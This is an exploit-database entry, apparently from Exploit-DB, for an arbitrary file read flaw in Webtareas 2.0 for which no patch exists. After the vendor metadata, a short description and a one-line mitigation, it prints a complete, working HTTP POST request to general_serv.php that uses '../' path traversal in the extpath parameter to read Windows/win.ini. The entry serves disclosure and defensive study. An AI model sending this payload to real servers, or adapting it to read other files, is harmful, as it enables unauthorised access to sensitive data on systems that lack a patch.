Webtateas 2.0 - Arbitrary File Read

vendor:

Webtareas

by:

China Banking and Insurance Information Technology Management Co.,Ltd.

7.5

CVSS

HIGH

Arbitrary File Read

CWE

Product Name: Webtareas

Affected Version From: Webtateas v2.0

Affected Version To: Webtateas v2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:webtareas:webtareas:2.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows

2020

Webtateas 2.0 – Arbitrary File Read

An attacker can exploit this vulnerability by sending a specially crafted POST request to the vulnerable application. The request contains an action parameter with a value of cardview-actions and a prefix and extpath parameter with a value of '../' and '../../../../Windows/win.ini' respectively. This allows the attacker to read arbitrary files from the server.

Mitigation:

The application should validate user input and restrict access to sensitive files.

Source

Exploit-DB raw data:

# Exploit Title: Webtateas 2.0 - Arbitrary File Read
# Date: 2020-04-12
# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
# Software Link: http://webtareas.sourceforge.net/general/home.php
# Version: Webtateas v2.0
# Tested on: Windows
# CVE : N/A

Vulnerable Request:
POST /webtareas/includes/general_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 72
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/general/home.php?
Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver
DNT: 1

action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini